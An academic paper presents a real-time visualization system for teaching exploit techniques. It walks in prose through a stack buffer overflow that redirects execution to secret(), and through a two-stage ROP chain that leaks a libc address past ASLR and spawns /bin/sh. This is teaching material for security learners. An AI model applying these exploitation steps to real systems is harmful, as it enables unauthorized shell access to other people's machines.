Real-time Attack-Scheme Visualization for Complex Exploit Technique Comprehension

Recent exploit techniques are highly complex, and it is not easy for cybersecurity learners to understand the attack strategies quickly and clearly. For efficient and comprehensive learning, this paper proposes an attack-scheme visualization system that fulfills three requirements: attack progress visualization in real-time, memory and register-level description, and concise description of the attack schemes. This paper exemplifies two cases: stack buffer overflow and ROP attacks, and demonstrates how the system operates and how users can learn that existing defense technologies are effective or ineffective depending on the execution environments.


I. INTRODUCTION
Nowadays, new vulnerabilities in software and hardware are discovered every day, and new attack techniques that exploit vulnerabilities have also been developed. Software and hardware vendors have devised a variety of countermeasures against those attack techniques; nevertheless, attackers have come up with ways to circumvent the countermeasures. Advances in attack technologies are being highly accelerated by various bug bounty programs (HackerOne, iDefence, etc.) and numbers of hacking competitions (Pwn2Own, Mobile Pwn2Own, DEFCON, etc.).
Because of this arm race between attackers and defenders, highly sophisticated cyber-attack techniques, such as control-flow hijack attacks [1], have been developed. One of them is return-oriented programming (ROP) [2], which is an exploit technique that allows attackers to achieve control flow hijacking through executing machine instruction sequences called a gadget, which is present in the machine's memory and ends with a return instruction. By chaining gadgets together, it is reported that attackers can perform arbitrary operations [3].
Meanwhile, the growing security market requires more security professionals. The need for skilled practitioners is projected to grow at a rate of 32% [4]. In our opinion, training systems for security specialists should provide the following three requirements for efficient and comprehensive learning: 1) The system should provide an environment in which exploit codes can run (e.g., it should not be a simulator or emulator), and should visualize what the code is performing in real-time because learners can gain a lot of knowledge through modifying and executing the codes. 2) The system should present enough detail explanation for exploit techniques; the system should describe "how the exploit codes work" rather than "what it can do." The assembly language level explanation is preferred to the script level such as Metasploit [5] etc. 3) The system should present only essential information related to the attack. Current exploit codes are highly complex and often include unnecessary instructions. Analysis tools [6] and debuggers provide sufficient detail but at the same time too much unrelated information. Filtering out irrelevant information in advance can enhance the efficiency of learning. There are companies, such as Palo Alto Networks, CISCO, IBM, etc. and open-source frameworks, such as FBCTF [7], CyTrONE [8], etc. that provide cyber ranges, virtual environments for cyberwarfare training and cyber technology development. These focus on teaching the best practice on how to respond to network cyber-crime rather than teaching how attack codes work. Another way to practice and learn hacking tools is to create a personal hacking lab, an isolated sandbox environment. A hacking lab typically uses open source software, such as Kali Linux [9] and Metasploitable [5]. A hacking lab explains what the script-level attack commands can do rather than how the attack codes work. For learning more deeply, learners must spend lots of time reading source codes.
The prototype system in this paper is designed to visualize in real-time the detail mechanisms related to the essence of attack schemes. As far as we know, there are no studies that discussed this type of learning system. The learning system currently has three functions. (1) The system displays the detailed status of a running exploit process on web pages. (2) The system can explain to learners why some defense techniques against the attack are effective/ineffective. Lastly, (3) the system tests learners' comprehension, for example, by asking them to make up an attack code applicable to a modified vulnerable code.
The paper is organized as follows. Section II presents the work related to this paper. Section III describes how the system visualizes a running attack code in real-time. Although there are numbers of complex control flow hijacking techniques, our prototype system currently supports stack buffer overflow and ROP attacks. Section IV exemplifies the visualization of these two attacks. Section V discusses how to deepen the knowledge about the attacks, and Section VI concludes the paper.

II. RELATED WORK
Recent cyber-attack techniques, especially control flow hijacking, are highly complex and numbers of variants of the techniques have been developed [10]. Furthermore, there are studies that automatically produce exploit codes for buffer overflows [11], ROP chains [12], heap overflows [13], etc.
To catch up with the development speed of attack tools, various mitigation technologies have been developed. They are Address Space Layout Randomization (ASLR) [14], No eXecute bit (NX bit) [15], Stack Smashing Protection (SSP) [16], Position-Independent Executable (PIE) [17], RELocation Read-Only (RELRO) [18] etc. The state-of-the-art defense technologies, whose implementation are currently research prototypes, are control-flow integrity (CFI) [19] and code-pointer integrity (CPI) [20]. All of them, however, cannot completely defeat the exploit techniques.
Another way to prevent or mitigate cyber-attacks is to practice hands-on training in a cyber range, where trainees experience attacks to find the best solutions to the attacks. There are researches that simulate attack situations for understanding basic concepts [21]- [23]. Realistic cybersecurity training is currently conducted in military environments, and the proprietary systems that are available publicly are expensive [8]. Some open-source training frameworks [7], [8] are recently available. They are, however, not suited for efficiently leaning how attack codes work. Fig. 1 illustrates the structure of our prototype system that consists of two modules: exploit and web-app. The exploit module attacks a vulnerable binary code vuln (whose C language source code is vuln.c) using pwntools, where pwntools is an exploit development library that helps attackers to create attack codes in the following three steps. First, it indicates what kinds of defense mechanisms the vulnerable code and the operating system have (Fig. 2). Second, it searches for vulnerabilities in the code. Third, it assists in creating attack codes to exploit the vulnerabilities. An attack code is not automatically created but it is assembled by attackers. To understand the scheme of the attackers, our system displays the memory data of a running vulnerable code in real time. This is feasible because the proc filesystem (procfs) [24] creates /proc/PID/mem file in memory, which contains the memory information of the running process whose process id is PID. The exploit retrieves an important part of the stack data from the file and then transfers the data to the Firefox browser in JSON format. The Selenium framework is used to adjust the timing of displaying the retrieved data on the browser.

III. SYSTEM CONFIGURATION
When the browser is ordered to open the URL of http://127.0.0.1.3000 using the HTTP GET method, the web-app module returns the web page, which is constructed by Flask, a web application framework. In Fig. 1, only an essential portion of the process memory is displayed on the browser and easy-to-understand comments are attached.
The system can work properly by adding two executable statements to the vulnerable code. The first is a function that outputs the buffer address used in the attack, whereby the system can recognize the place where in the stack area the system should focus on (the address can be automatically retrieved from /proc/PID/mem file if ASLR is not enabled).
In Fig.  1, printf("[+] address: %p\n\n", &name) in vuln.c corresponds to the statement. The second is function sleep(3), which requires the next statement of the function to be executed after three seconds. The function must be inserted just before return or exit statement; otherwise, the system may not be able to read the data in the memory file due to the termination of the process.

IV. CASE STUDIES
This section illustrates the feasibility of our approach. The prototype software running on an Ubuntu 18.04.3 LTS machine visualizes two attacks: stack buffer overflow and ROP attacks.

A. Stack Buffer Overflow
The stack buffer overflow attacks are classical and straightforward attacks, and at least five countermeasures have been implemented in the current Ubuntu system: RELRO, SSP, NX bit, PIE, and ASLR. These are explained later when necessary. Fig. 2 shows the status of them. ASLR, which is a system-wide property, is enabled in our environment. Under the environment shown in Fig. 2, our system exemplifies how an overflow attack can divert the flow of execution into any function or codes using binary code vuln (whose source code vuln.c is in Fig. 1).
If a function, say secret(), is also defined in the vuln.c file and the name of the function is a priori known, then pwntools can derive the memory address of the function from symbol name "secret." When vuln asks to input your name (see puts("Please input your name") in vuln.c), the exploit sends 49-byte data (called a payload from now on), which consists of 40 characters of 'A,' the address of function secret(), and a line feed code. The intent of the exploit can be articulated by visualization. Fig. 3 shows the web pages output by the system. It can be easily recognized that the overflow attack replaces not only the buffer area with characters 'A' but also the return address of __libc_start_main with the address of function secret(), which implies that the exploit module has controlled the execution flow.

B. Return-Oriented Programming
ROP further develops the potential for buffer overflow attacks. The overflow attack often inserts malicious codes into the data storage area. Even if the NX bit [15] marks the storage area non-executable, ROP attacks can circumvent this mechanism by using the existing code in static or dynamic libraries. Therefore, ROP is one of the code reuse attacks. In the ROP attacks, attackers often make up complex payloads that consist of a variety of "ROP gadgets," which are short sequences of assembly instructions that end with ret, and put them in the stack area.
In this case study, the system demonstrates how an attacker can invoke shell /bin/sh using vulnerable code vuln under the same condition shown in Fig.2. Note in general that the ability of adversaries to operate the shell without formal login authentication implies that they can remotely control the target machines. The exploit executes the function main() in vuln.c twice for coping with another defense mechanism ASLR [14], which randomly arranges the address space positions of the stack, heap, libraries, etc. Fig. 3. The web page before and after the overflow attack. The ASCII code of character 'A' is 41in hexadecimal notation. Fig. 4 shows a log file of pwntools, which records all interactions with other functions such that "Sent" ("Received") in the log file indicates data sent (received) by the exploit module. As shown in the figure, the exploit sends 0x49-byte (73-byte) data twice and received an address (libc: 0x7fb895320000), which is the base address of library libc randomly selected by ASLR. Note that the exploit successfully invokes /bin/sh; the last line of the log file contains "$," which works as the prompt of the shell.
The log file explains almost nothing about why the shell prompt appears; whereas our system clearly answers the essence of the attacker's tactics in real-time by outputting the web pages in Fig. 5 and Fig. 6. As shown in Fig. 5, using the stack buffer overflow, the first payload rewrites the return address with the address of a gadget, which executes only two instructions: pop rdi and ret. When the gadget is executed, the stack pointer register (RSP) points to the next address of the replaced address, in which the address of puts@got is written. Since the gadget executes pop rdi, the address of puts@got is moved to RDI register and the gadget returns the execution flow to the address where the address of puts@plt exists. Therefore, function puts() outputs the address of puts@got and returns to the next address where the address of main() exists. In short, the aim of the exploit is to execute "puts(puts@got)" and go back to main().  The values of registers change with time. In Fig. 5, RDI has the address of puts@got and RSP points to the address in which the address of main() exists. Therefore, the figure expresses the state of the memory and registers just before the main function is executed again.
The address of puts@got is used to calculate the address of function system() that executes /bin/sh. The address is obtained by adding the base address of library libc to the relative address of symbol 'system' in the library. Since ASLR works, the base address of library libc is randomly selected; nevertheless the exploit can obtain the base address by subtracting the relative address of symbol 'puts' from the address of puts@got (the current address of puts()).
In Fig. 6, there are two ROP gadgets. The first gadget is not meaningless; it is used for movaps instruction to work properly. The second puts the address of characters "/bin/sh" in RDI so that system() invokes /bin/sh. Now that the address of system() is resolved, the address is included in the second payload.

V. FURTHER LEARNING
Learners can observe more clearly the behavior of payloads and the defense systems by modifying the vulnerable codes or execution environments. Let us consider the case where a learner changes an option of compiler gcc so that the SSP mechanism [16] is enabled. Fig. 7 shows that SSP inserted a stack canary between the buffer name[] and the return address just after scanf("%s", name) was called. After the ROP attack, as shown in Fig. 8, the canary was overwritten by 0x4141414141414141. The change in the canary value when the function returns indicates an occurrence of buffer overflow. The memo in the figure indicates termination of the process due to stack smashing detection. The termination prevents the exploit from taking control of the process. Learners can further deepen their knowledge by creating a payload that solves the problems given by the system. For example, the system askes learners to invoke /bin/sh when the buffer size of name[] in vuln.c is reduced from 32 to 16 bytes.
Since our system can visualize the memory content of processes in real time, we can easily extend the system to support any kind of control-flow hijacking attacks, which include heap overflow and format string attacks.

VI. CONCLUSIONS AND FUTURE WORK
Current exploit techniques are highly sophisticated and complex. For efficient and comprehensive learning of the techniques, we proposed a new approach that achieves real-time attack progress visualization, assembly language-level detailed description, and concise description of the attack schemes. Our idea was to display attack code behavior in the stack area in cooperation with the proc filesystem.
A prototype system that visualizes stack buffer overflow and return-oriented programming attacks demonstrated the feasibility of our approach. The system enables learners to further deepen their knowledge by executing a vulnerable code after modifying the code or execution conditions.
We are currently planning two research projects. The first is to implement the system as a web application so that users can learn from a distance. The second is to visualize more complex control-flow hijack attacks such as heap overflow.